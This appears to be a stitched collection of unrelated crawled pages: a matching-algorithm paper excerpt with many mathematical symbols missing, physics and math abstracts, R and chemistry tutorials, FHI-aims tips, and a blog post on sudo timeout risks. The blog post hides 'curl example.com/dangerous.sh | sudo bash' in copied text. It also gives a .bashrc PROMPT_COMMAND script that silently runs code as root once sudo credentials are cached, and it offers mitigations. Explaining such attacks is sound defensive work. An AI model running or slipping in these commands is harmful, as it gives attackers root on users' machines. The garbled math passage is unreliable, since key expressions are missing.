Remarks about Algorithms ALG1 and ALG2. We show that our analysis of ALG1 and ALG2 is tight via the following example, on which both algorithms compute an exact ℓp-approximation. Suppose there are agents and programs . The cost of is and the cost of and is . The preference lists are shown below.
a1 : p0, p1
⋮
ak : p0, p1
a : p0, p2

p0 : a1, …, ak, a
p1 : a1, …, ak
p2 : a
Algorithms ALG1 and ALG2 both compute a matching that has cost , while the optimal matching has cost . Note that . We also note that both our algorithms compute Pareto cost-optimal matchings.
3.3 Approximation algorithms for short preference lists of agents
We consider the instances of SMFQ where agents have preference lists of length exactly two. This case is NP-hard, as can be seen from Theorem 1. We give a simple deterministic LP rounding algorithm for this case that achieves a -approximation. We have an LP variable for every edge in the underlying bipartite graph. Consider the following linear program for computing a min-cost -perfect stable matching. Since the upper quotas are not fixed, for stability it is enough to have the following: if a program is matched to an agent , then every agent must be matched to a program at least as preferred as by . This is captured by the first constraint (Eq. 2). The second constraint (Eq. 3) captures that the desired matching is -perfect, and the third constraint (Eq. 4) is a non-negativity constraint on the LP variables. The objective (Eq. 1) is to minimize the cost of the matching, computed as a sum, over all programs , of the cost multiplied by the number of agents matched to .
minimize

$\sum_{p \in P} c(p) \cdot \Big( \sum_{(a,p) \in E} x_{a,p} \Big)$   (1)

subject to

$\sum_{p' \geq_a p} x_{a,p'} \;\geq\; x_{a',p} \qquad \forall (a,p) \in E,\ a'$
Deterministic rounding. Suppose is an LP optimal solution. We construct a matching as follows. Initially . For every agent , we do the following: let and be the two programs in the preference list of agent , in that order. If , then we add to ; otherwise we add to .
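A short Python sketch of the rounding step, taking the fractional LP optimum as given. The cutoff value of 1/2 is an assumption of ours (the precise condition is elided in the text above); the point is only that each agent is deterministically assigned to one of her two listed programs based on her LP values.

def round_lp(pref_a, x):
    # pref_a[a] = [p1, p2] with p1 preferred to p2; x[(a, p)] is the LP value of edge (a, p).
    M = {}
    for a, (p1, p2) in pref_a.items():
        M[a] = p1 if x[(a, p1)] >= 0.5 else p2
    return M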
Matching is -perfect and stable.
Proof.
For every agent , it is guaranteed (by Eq. 3) that either or . Thus, every agent is matched in .
Now we show that is stable. For contradiction, assume that blocks . This implies that there exists an agent such that and . Let . Since | 2021-07-26 04:46:04 | {"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8271313905715942, "perplexity": 638.5299791604507}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-31/segments/1627046152000.25/warc/CC-MAIN-20210726031942-20210726061942-00343.warc.gz"} |
http://math.sjtu.edu.cn/Conference/2015WCA/talk.php?ZhuYan | 2015 Workshop on Combinatorics and Applications at SJTU
April 21 -- 27, Shanghai Jiao Tong University
Date: Tuesday, April 21, 2015
Time: 11:45 - 12:15
Venue: Large Meeting Room, Math Building
Title: Tight Relative $2e$-Designs in Association Schemes
Abstract:
Relative $t$-designs are defined on Q-polynomial association schemes, and we call such a design tight if it satisfies the Fisher-type lower bound. We will mainly review some results about tight relative $2$-designs $(Y,w)$ on two shells $X_{r_1} \cup X_{r_2}$ in the binary Hamming association scheme $H(n,2)$ and the Johnson association scheme $J(v,k)$. The good feature of $H(n,2)$ is that the distance set $\{ \alpha_1,\alpha_2,\gamma \}$ and $\frac{w_2}{w_1}$ are uniquely expressed in terms of $n,r_1,r_2,N_{r_1}$. This implies that a coherent configuration is attached to $Y$. (However, for $J(v,k)$, this property is difficult to prove in general.) There exist many tight relative $2$-designs in $H(n,2)$ with both constant weight and $w_2 \neq w_1$. So far, we are unable to find such designs with $w_2 \neq w_1$ in $J(v,k)$. We are now working on the existence of tight relative $4$-designs on two shells in $H(n,2)$. In this case, we cannot determine all the feasible parameters, but it is proved that $Y \cap X_{r_i}$, $i=1,2$, should be a combinatorial $3$-design. Finally, this problem is related to the existence of some combinatorial designs. This is joint work with Eiichi Bannai and Etsuko Bannai.
https://ftp.aimsciences.org/article/doi/10.3934/proc.2011.2011.963 | Article Contents
Article Contents
# Continuous maximal regularity and analytic semigroups
• In this paper we establish a result regarding the connection between continuous maximal regularity and the generation of analytic semigroups on a pair of densely embedded Banach spaces. More precisely, we show that continuous maximal regularity for a closed operator $A$ : $E_1 \to E_0$ implies that $A$ generates a strongly continuous analytic semigroup on $E_0$ with domain equal to $E_1$.
Mathematics Subject Classification: Primary: 35K90, 47D06; Secondary: 35K35.
Open Access Under a Creative Commons license | 2023-03-21 17:24:50 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 1, "x-ck12": 0, "texerror": 0, "math_score": 0.3010075092315674, "perplexity": 439.41869746976454}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943704.21/warc/CC-MAIN-20230321162614-20230321192614-00578.warc.gz"} |
https://fhi-aims-club.gitlab.io/tutorials/scaling-in-fhi-aims/summary/ | Summary
To set up, run, and produce reproducible results on a supercomputer (or, in fact, any machine), you should be aware of several fundamental aspects. They are summarized briefly below.
Understanding the Supercomputer and its environment
• Get an overview of the supercomputer's architecture (number of nodes, number of CPUs per node, memory per node, type of CPUs, accelerators, walltimes, homogenous/inhomogenous node architecture)
• Which compilers and libraries are available on the computer systems and which ones might be appropriate to compile and link FHI-aims?
• How does the queuing (job submission) system work?
Compiling an optimized FHI-aims executable
• Find out which libraries and compilers are available, including their versions. Unfortunately, some compiler and library combinations can contain bugs that are outside the control of the FHI-aims code itself. Check the FHI-aims wiki (located at https://aims-git.rz-berlin.mpg.de/aims/FHIaims/-/wikis/home) to see whether issues are already known for the specific library/compiler versions you might be trying to use.
• Are the environment and available libraries the same when compiling the executable and when running it? (The executable should always be compiled for the instruction set available during execution.)
• Use compiler optimization flags (e.g. -O3 or AVX instruction sets).
• Run the FHI-aims regression tests for your new executable on your supercomputer. You can find them in the FHIaims/regression_tests/ folder. | 2022-06-26 07:24:43 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.487612247467041, "perplexity": 4790.354899543534}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-27/segments/1656103037649.11/warc/CC-MAIN-20220626071255-20220626101255-00385.warc.gz"} |
https://labs.tib.eu/arxiv/?author=N.%20R.%20Davies | • Spin resonance in the superconducting state of Li$_{1-x}$Fe$_{x}$ODFe$_{1-y}$Se observed by neutron spectroscopy(1607.05588)
Oct. 25, 2016 cond-mat.supr-con
We have performed inelastic neutron scattering measurements on a powder sample of the superconductor lithium iron selenide hydroxide Li$_{1-x}$Fe$_{x}$ODFe$_{1-y}$Se ($x \simeq 0.16, y \simeq 0.02$, $T_{\rm c} = 41$\,K). The spectrum shows an enhanced intensity below $T_{\rm c}$ over an energy range $0.64\times2\Delta < E < 2\Delta$, where $\Delta$ is the superconducting gap, with maxima at the wave vectors $Q_1 \simeq 1.46$\,\AA$^{-1}$ and $Q_2 \simeq 1.97$\,\AA$^{-1}$. The behavior of this feature is consistent with the spin resonance mode found in other unconventional superconductors, and strongly resembles the spin resonance observed in the spectrum of the molecular-intercalated iron selenide, Li$_{0.6}$(ND$_{2}$)$_{0.2}$(ND$_{3}$)$_{0.8}$Fe$_{2}$Se$_{2}$. The signal can be described with a characteristic two-dimensional wave vector $(\pi, 0.67\pi)$ in the Brillouin zone of the iron square lattice, consistent with the nesting vector between electron Fermi sheets.
• Commensurate lattice distortion in the layered titanium oxypnictides Na$_{2}$Ti$_{2}Pn_{2}$O ($Pn =$ As, Sb) determined by X-ray diffraction(1604.07284)
Oct. 25, 2016 cond-mat.supr-con
We report single crystal X-ray diffraction measurements on Na$_2$Ti$_{2}Pn_{2}$O ($Pn$ = As, Sb) which reveal a charge superstructure that appears below the density wave transitions previously observed in bulk data. From symmetry-constrained structure refinements we establish that the associated distortion mode can be described by two propagation vectors, ${\bf q}_{1} = (1/2, 0, l)$ and ${\bf q}_{2} = (0, 1/2, l)$, with $l=0$ (Sb) or $l = 1/2$ (As), and primarily involves in-plane displacements of the Ti atoms perpendicular to the Ti--O bonds. The results provide direct evidence for phonon-assisted charge density wave order in Na$_2$Ti$_{2}Pn_{2}$O and identify a proximate ordered phase that could compete with superconductivity in doped BaTi$_{2}$Sb$_{2}$O.
• Suppression of orbital ordering by chemical pressure in FeSe1-xSx(1508.05016)
We report a high-resolution angle-resolved photo-emission spectroscopy study of the evolution of the electronic structure of FeSe1-xSx single crystals. Isovalent S substitution onto the Se site constitutes a chemical pressure which subtly modifies the electronic structure of FeSe at high temperatures and induces a suppression of the tetragonal-symmetry-breaking structural transition temperature from 87K to 58K for x=0.15. With increasing S substitution, we find smaller splitting between bands with dyz and dxz orbital character and weaker anisotropic distortions of the low temperature Fermi surfaces. These effects evolve systematically as a function of both S substitution and temperature, providing strong evidence that an orbital ordering is the underlying order parameter of the structural transition in FeSe1-xSx. Finally, we detect the small inner hole pocket for x=0.12, which is pushed below the Fermi level in the orbitally-ordered low temperature Fermi surface of FeSe.
• Emergence of the nematic electronic state in FeSe(1502.02917)
We present a comprehensive study of the evolution of the nematic electronic structure of FeSe using high resolution angle-resolved photoemission spectroscopy (ARPES), quantum oscillations in the normal state and elastoresistance measurements. Our high resolution ARPES allows us to track the Fermi surface deformation from four-fold to two-fold symmetry across the structural transition at ~87 K which is stabilized as a result of the dramatic splitting of bands associated with dxz and dyz character. The low temperature Fermi surface is that of a compensated metal consisting of one hole and two electron bands and is fully determined by combining the knowledge from ARPES and quantum oscillations. A manifestation of the nematic state is the significant increase in the nematic susceptibility on approaching the structural transition that we detect from our elastoresistance measurements on FeSe. The dramatic changes in electronic structure cannot be explained by the small lattice effects and, in the absence of magnetic fluctuations above the structural transition, point clearly towards an electronically driven transition in FeSe stabilized by orbital-charge ordering.
https://stats.libretexts.org/Bookshelves/Applied_Statistics/Book%3A_Learning_Statistics_with_R_-_A_tutorial_for_Psychology_Students_and_other_Beginners_(Navarro)/04%3A_Additional_R_Concepts/4.10%3A_Formulas | # 4.10: Formulas
The last kind of variable that I want to introduce before finally being able to start talking about statistics is the formula. Formulas were originally introduced into R as a convenient way to specify a particular type of statistical model (see Chapter 15), but they're such handy things that they've spread. Formulas are now used in a lot of different contexts, so it makes sense to introduce them early.
Stated simply, a formula object is a variable, but it's a special type of variable that specifies a relationship between other variables. A formula is specified using the "tilde operator" ~. A very simple example of a formula is shown below:
formula1 <- out ~ pred
formula1
## out ~ pred
The precise meaning of this formula depends on exactly what you want to do with it, but in broad terms it means “the out (outcome) variable, analysed in terms of the pred (predictor) variable”. That said, although the simplest and most common form of a formula uses the “one variable on the left, one variable on the right” format, there are others. For instance, the following examples are all reasonably common
formula2 <- out ~ pred1 + pred2 # more than one variable on the right
formula3 <- out ~ pred1 * pred2 # different relationship between predictors
formula4 <- ~ var1 + var2 # a 'one-sided' formula
and there are many more variants besides. Formulas are pretty flexible things, and so different functions will make use of different formats, depending on what the function is intended to do.
This page titled 4.10: Formulas is shared under a CC BY-SA 4.0 license and was authored, remixed, and/or curated by Danielle Navarro via source content that was edited to the style and standards of the LibreTexts platform; a detailed edit history is available upon request. | 2022-08-13 06:13:02 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8974347710609436, "perplexity": 849.1839454524722}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571909.51/warc/CC-MAIN-20220813051311-20220813081311-00373.warc.gz"} |
https://zbmath.org/?q=an:0856.34019 | # zbMATH — the first resource for mathematics
Systems of conditional differential inequalities of Kato type. (English. Russian original) Zbl 0856.34019
Sib. Math. J. 35, No. 6, 1109-1118 (1994); translation from Sib. Mat. Zh. 35, No. 6, 1253-1263 (1994).
This paper is concerned with the extension of some results of J. Kato on differential inequalities from the scalar case to the $$k$$-dimensional case.
##### MSC:
34A40 Differential inequalities involving functions of a single real variable
##### Keywords:
differential inequalities
https://en.wikibooks.org/wiki/Solutions_to_General_Chemistry_(Linus_Pauling)/The_Nature_and_Properties_of_Matter | # Solutions to General Chemistry (Linus Pauling)/The Nature and Properties of Matter
## 1-1
What is the difference between matter and radiant energy?
The essential distinction between these two forms of mass-energy is that matter moves at a velocity of less than the speed of light, and that radiant energy moves at the speed of light.
## 1-2
What is the Einstein relation between mass and energy? Indicate the IS units of the terms in this relation. This is of course the cliched ${\displaystyle E=mc^{2}}$. In terms of IS units, the equation reads:
${\displaystyle \mathrm {J} =\mathrm {kg} \cdot \left({\frac {\mathrm {m} }{\mathrm {s} }}\right)^{2}}$
Note that the term ${\displaystyle \mathrm {J} }$ (for joules) on the left-hand side resolves to:
${\displaystyle \mathrm {N} \cdot \mathrm {m} =\mathrm {kg} \cdot {\frac {\mathrm {m} }{\mathrm {s} ^{2}}}\cdot \mathrm {m} =\mathrm {kg} \cdot \left({\frac {\mathrm {m} }{\mathrm {s} }}\right)^{2}}$
As such the units are equal on either side, as required.
## 1-3
Approximately how much energy, in IS units, is needed to raise 1 liter (1 kg) of liquid water from 273.15°K to 373.15°K? (See the discussion of the calorie, Section 1-3.)
The answer will have to be written in joules. However, the most convenient unit for the purposes of calculation is the thermochemical calorie, which is equal to 4.184 J. The thermochemical calorie, in turn, is slightly smaller than the 15°C calorie, the unit of energy required to raise the temperature of a gram of water from 14.5 to 15.5°C at standard temperature. Since only an approximate answer is needed, though, simply bear in mind that the Kelvin and the Celsius scale have the same magnitude. Then the required number of (thermochemical) calories is 100,000 thermochemical calories, or 418,400 joules (418.4 kJ).
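As a quick numerical check (a Python sketch; the rounded value of 4184 J per kilogram per kelvin for the specific heat of water, i.e. 4.184 J per thermochemical calorie per gram, is the assumption):

mass_kg = 1.0                        # 1 liter of water
specific_heat = 4184                 # J per kg per kelvin (rounded thermochemical value)
delta_T = 373.15 - 273.15            # 100 kelvin
print(mass_kg * specific_heat * delta_T)   # 418400.0 J, i.e. about 418.4 kJ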
## 1-4
Verify the following... To convert Celsius to Fahrenheit we must multiply by 1.8 and then add 32; to convert Fahrenheit to Celsius we must subtract 32 and then divide by 1.8.
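The two rules can be written out as a small Python sketch (the function names are ours); it also confirms the answer to 1-5 below:

def c_to_f(c):
    return 1.8 * c + 32        # multiply by 1.8, then add 32

def f_to_c(f):
    return (f - 32) / 1.8      # subtract 32, then divide by 1.8

print(c_to_f(100))             # 212.0
print(c_to_f(-40))             # -40.0, the single temperature at which both scales agree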
## 1-5
Mercury freezes at -40°C. What is its freezing point on the Fahrenheit scale?
-40°F (the only temperature which is the same on both scales).
## 1-6
For each of the following systems (1) state how many phases are present in the system; (2) state for each phase whether it is a pure substance or a mixture; (3) give the constituents of the system; (4) give a set of components for the system:
1. A flask containing a saturated aqueous solution of salt and several crystals of salt.
1. Two.
2. The aqueous phase is a mixture, as it contains water and salt. The solid phase, however, can be considered a pure substance.
3. The constituents are the aqueous and solid phases of salt.
4. The components are salt and water.
2. An evacuated, sealed quartz tube of 100-ml volume containing 10 g of pure zinc heated until about one half the zinc is melted.
1. Disregarding the quartz tube itself, there are two phases present in the system.
2. Both phases exist in the form of pure substances.
3. The constituents are the liquid and solid phases of zinc.
4. There is one component, zinc.
3. As ([2]) , but containing 10 g of a copper-gold alloy instead of 10 g of zinc.
1. There are two phases in the system (using the same assumption regarding the container as before).
2. Both phases are mixtures, specifically, alloys.
3. The constituents are the liquid and solid phases of the copper-gold alloy.
4. There are two components, copper and gold.
## 1-7
What is meant by "intrinsic property" of a substance? Are odor, shape, density, color, weight, taste, luster, area, magnetic susceptibility, and heat capacity intrinsic properties? Which of these are properties that can be quantitatively measured?
An intrinsic property of a substance is one which is not significantly affected by the size of any given amount of the substance, or its state of subdivision. In other words, a mountain of pulverized salt (sodium chloride) shares in common with a baseball-sized salt crystal certain invariant, intrinsic properties, such as density and cleavage. The color of a substance is an important physical property. It is interesting to note that the apparent color of a substance depends upon its state of subdivision: the color becomes lighter as large particles are ground up into smaller ones, because the distance through which the light penetrates before it is reflected back from the interfaces (surfaces) becomes less as the particles become smaller.
Odor, density, color, taste, magnetic susceptibility and heat capacity are intrinsic properties, though odor and color may be somewhat magnified when the material is finely subdivided. Shape, weight and area are not intrinsic, since they depend on the amount of material.
Density, color, weight, area, magnetic susceptibility and heat capacity can be quantitatively measured. | 2021-04-10 15:24:19 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 4, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7409032583236694, "perplexity": 1267.3709168808919}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-17/segments/1618038057142.4/warc/CC-MAIN-20210410134715-20210410164715-00417.warc.gz"} |
https://martin-ueding.de/posts/sudo-timeout-risk/ | # The dangers of sudo timeout
Ubuntu is configured by default to cache the user's credentials for a couple minutes after a successful use of sudo. This is very comfortable. When you enter a couple commands in succession, you do not have to enter the password every single time. Take the following:
sudo apt-get update
sudo apt-get upgrade
sudo apt-get autoremove
If the sudo authentication were not cached, you would have to enter your password three times.
## The hidden text
There is a danger to this. One often finds code snippets on the internet which tell you to perform commands like the apt-get commands above. There is a very subtle trick to smuggle in something you did not see. Take the following text: mark it with your mouse, copy it, and paste it into the text field below on the original page. You can also paste it into your terminal; this particular snippet is not malicious.
echo I have copied this from the DANGEROUS internet.
Did the word DANGEROUS show up? If not, your browser is smarter than mine. Now an attacker can do the following. First he will tell you to run something innocent like sudo apt-get update. You enter your password and your credentials are cached. Then after a few other innocent commands he will prepare something like the following:
something; curl example.com/dangerous.sh | sudo bash; something
The part between the semicolons will be hidden, of course. You would only see something; something, which looks fine to you. The dangerous.sh script will contain some malicious payload which is then executed directly as root.
Some malicious things I could think of:
• Set up a cron job to download more payload every day. You never know what you might want to do with a hacked computer, right?
• Add your own package repository to the system. Then you can even "update" packages on the machine and the user will think that he is installing a legitimate update. openSUSE's zypper will tell you about such "vendor changes", which is a very good thing.
• Create yourself a user account on the machine and do something funny with it.
• Change the root password, remove all other users from the sudoers file and adm group. Then demand a ransom. If you have bad luck, the user knows how to use a Live CD and not to trust a compromised system.
So I have shown you a way to get superuser access to a computer with the sudo timeout when you get the user to paste something into his terminal session where the credentials are cached. But some users might be more careful. They might know about the credential caching and only copy code from the internet when it does not involve sudo. One can still get them with the timeout. It is just a tad harder.
The sudo credential caching usually only works within the active session. So when you open a second terminal window and execute something with sudo, you will have to type the password again. Otherwise you could simply have some process lurking in the background, trying to call sudo every minute to see whether cached credentials are available.
One needs to sneak into the currently active terminal window. It is not hard and I will show you how easy it is to do. First one needs to upload a script like the following to say example.com/mount_attack.sh:
#!/bin/bash
echo 'PROMPT_COMMAND="sudo -n ~/.try_root.sh &> /dev/null && echo Owned!"' >> ~/.bashrc
cat > ~/.try_root.sh <<EOF
#!/bin/bash
touch /tmp/owned
EOF
chmod +x ~/.try_root.sh
Using the method described above, get the user to execute something like curl example.com/mount_attack.sh | bash. Since no superuser permissions are involved, there is no waiting or dependence on the timeout.
The next time the user opens up a terminal, the new .bashrc will be read. The PROMPT_COMMAND is executed before the prompt is displayed. The -n flag lets sudo run in non-interactive mode. It will just fail if the credentials are not cached. All output is suppressed, so the user will not notice anything.
Once the superuser credentials are cached in the current session, the PROMPT_COMMAND will be able to execute the .try_root.sh script which will then dig into the system and make itself at home. It could do all the things that I have mentioned above.
In a real attack, one would obfuscate the names of all things involved. After gaining superuser access it would be a good idea to remove the traces within the home directory.
## Mitigation
You should be able to protect yourself from this. You can do this in layers.
• Disable the sudo timeout completely. This can be done by adding the following line to /etc/sudoers:
Defaults timestamp_timeout=0
Instead you can use sudo -i to obtain a root login shell and type all the commands without sudo. This is more secure than using sudo -s, since sudo -s keeps your own .bashrc instead of root's. An attack like the one I just showed should therefore be possible against sudo -s as well: just wait until the user ID changes to 0 and launch your code.
• Do not copy & paste code from websites directly into your shell. Paste it into an editor window instead and look at what it does. Alternatively, you could type the commands yourself.
Regularly scanning files like .bashrc for this kind of thing is probably not doing any good. The attacker would just remove all the traces once the attack is launched. There are so many attack vectors that cleaning up is probably not worth the effort. Rather, invest in security up front by being cautious.
https://scholar.harvard.edu/efthimios_kaxiras/publications?page=5%2C0%2C0%2C0%2C0%2C3 | # Publications
2016
Montemore M, Hoyt R, Kaxiras E. Non-adiabatic effects and electronic excitations during dissociation on catalytic surfaces. ABSTRACTS OF PAPERS OF THE AMERICAN CHEMICAL SOCIETY. 2016;252.
Montemore M, Hoyt R, Kaxiras E. Non-adiabatic energy dissipation in dissociation on catalytic surface. ABSTRACTS OF PAPERS OF THE AMERICAN CHEMICAL SOCIETY. 2016;251.
Karakalos S, Xu Y, Kabeer FC, Chen W, Rodriguez-Reyes JCF, Tkatchenko A, Kaxiras E, Madix RJ, Friend CM. Noncovalent Bonding Controls Selectivity in Heterogeneous Catalysis: Coupling Reactions on Gold. JOURNAL OF THE AMERICAN CHEMICAL SOCIETY. 2016;138 (46) :15243-15250.Abstract
Enhancing the selectivity of catalytic processes has potential for substantially increasing the sustainability of chemical production. Herein, we establish relationships between reaction selectivity and molecular structure for a homologous series of key intermediates for oxidative coupling of alcohols on gold using a combination of experiment and theory. We establish a scale of binding for molecules with different alkyl structures and chain lengths and thereby demonstrate the critical nature of noncovalent van der Waals interactions in determining the selectivity by modulating the stability of key reaction intermediates bound to the surface. The binding hierarchy is the same for Au(111) and Au(110), which demonstrates a relative lack of sensitivity to the surface structure. The hierarchy of binding established in this work provides guiding principles for predicting how molecular structure affects the competition for binding sites more broadly. Besides the nature of the primary surface-molecule bonding, three additional factors that affect the stabilities of the reactive intermediates are clearly established: (1) the number of C atoms in the alkyl chain, (2) the presence of C-C bond unsaturation, and (3) the degree of branching of the alkyl group of the adsorbed molecules. We suggest that this is a fundamental principle that is generally applicable to a broad range of reactions on metal catalysts.
Tritsaris GA, Shirodkar SN, Kaxiras E, Cazeaux P, Luskin M, Plechac P, Cances E. Perturbation theory for weakly coupled two-dimensional layers. JOURNAL OF MATERIALS RESEARCH. 2016;31 (7) :959-966.Abstract
A key issue in two-dimensional structures composed of atom-thick sheets of electronic materials is the dependence of the properties of the combined system on the features of its parts. Here, we introduce a simple framework for the study of the electronic structure of layered assemblies based on perturbation theory. Within this framework, we calculate the band structure of commensurate and twisted bilayers of graphene (Gr) and hexagonal boron nitride (h-BN), and of a Gr/h-BN heterostructure, which we compare with reference full-scale density functional theory calculations. This study presents a general methodology for computationally efficient calculations of two-dimensional materials and also demonstrates that for relatively large twist in the graphene bilayer, the perturbation of electronic states near the Fermi level is negligible.
Kolesov G, Granas O, Hoyt R, Vinichenko D, Kaxiras E. Real-Time TD-DFT with Classical Ion Dynamics: Methodology and Applications. JOURNAL OF CHEMICAL THEORY AND COMPUTATION. 2016;12 (2) :466-476.Abstract
We present a method for real-time propagation of electronic wave functions, within time-dependent density functional theory (RT-TDDFT), coupled to ionic motion through mean-field classical dynamics. The goal of our method is to treat large systems and complex processes, in particular photocatalytic reactions and electron transfer events on surfaces and thin films. Due to the complexity of these processes, computational approaches are needed to provide insight into the underlying physical mechanisms and are therefore crucial for the rational design of new materials. Because of the short time step required for electron propagation (of order similar to 10 attoseconds), these simulations are computationally very demanding. Our methodology is based on numerical atomic-orbital-basis sets for computational efficiency. In the computational package, to which we refer as TDAP-2.0 (Time-evolving Deterministic Atom Propagator), we have implemented a number of important features and analysis tools for more accurate and efficient treatment of large, complex systems and time scales that reach into a fraction of a picosecond. We showcase the capabilities of our method using four different examples: (i) photodissociation into radicals of opposite spin, (ii) hydrogen adsorption on aluminum surfaces, (iii) optical absorption of spin-polarized organic molecule containing a metal ion, and (iv) electron transfer in a prototypical dye sensitized solar cell.
Hiebel F, Shong B, Chen W, Madix RJ, Kaxiras E, Friend CM. Self-assembly of acetate adsorbates drives atomic rearrangement on the Au(110) surface. NATURE COMMUNICATIONS. 2016;7.Abstract
Weak inter-adsorbate interactions are shown to play a crucial role in determining surface structure, with major implications for its catalytic reactivity. This is exemplified here in the case of acetate bound to Au(110), where the small extra energy of the van der Waals interactions among the surface-bound groups drives massive restructuring of the underlying Au. Acetate is a key intermediate in electro-oxidation of CO2 and a poison in partial oxidation reactions. Metal atom migration originates at surface defects and is likely facilitated by weakened Au-Au interactions due to bonding with the acetate. Even though the acetate is a relatively small molecule, weak intermolecular interaction provides the energy required for molecular self-assembly and reorganization of the metal surface.
Defo RK, Fang S, Shirodkar SN, Tritsaris GA, Dimoulas A, Kaxiras E. Strain dependence of band gaps and exciton energies in pure and mixed transition-metal dichalcogenides. PHYSICAL REVIEW B. 2016;94 (15).Abstract
The ability to fabricate 2D device architectures with desired properties, based on stacking of weakly (van der Waals) interacting atomically thin layers, is quickly becoming reality. In order to design ever more complex devices of this type, it is crucial to know the precise strain and composition dependence of the layers' electronic and optical properties. Here, we present a theoretical study of these dependences for monolayers with compositions varying from pure MX2 to the mixed MXY, where M = Mo, W and X
S. S. Schoenholz, Cubuk ED, Sussman DM, Kaxiras E, Liu AJ. A structural approach to relaxation in glassy liquids. NATURE PHYSICS. 2016;12 (5) :469+.Abstract
In contrast with crystallization, there is no noticeable structural change at the glass transition. Characteristic features of glassy dynamics that appear below an onset temperature, T-0 (refs 1-3), are qualitatively captured by mean field theory(4-6), which assumes uniform local structure. Studies of more realistic systems have found only weak correlations between structure and dynamics(7-11). This raises the question: is structure important to glassy dynamics in three dimensions? We answer this question affirmatively, using machine learning to identify a new field, softness' which characterizes local structure and is strongly correlated with dynamics. We find that the onset of glassy dynamics at T-0 corresponds to the onset of correlations between softness (that is, structure) and dynamics. Moreover, we construct a simple model of relaxation that agrees well with our simulation results, showing that a theory of the evolution of softness in time would constitute a theory of glassy dynamics.
Cubuk ED, Schoenholz SS, Kaxiras E, Liu AJ. Structural Properties of Defects in Glassy Liquids. JOURNAL OF PHYSICAL CHEMISTRY B. 2016;120 (26) :6139-6146.Abstract
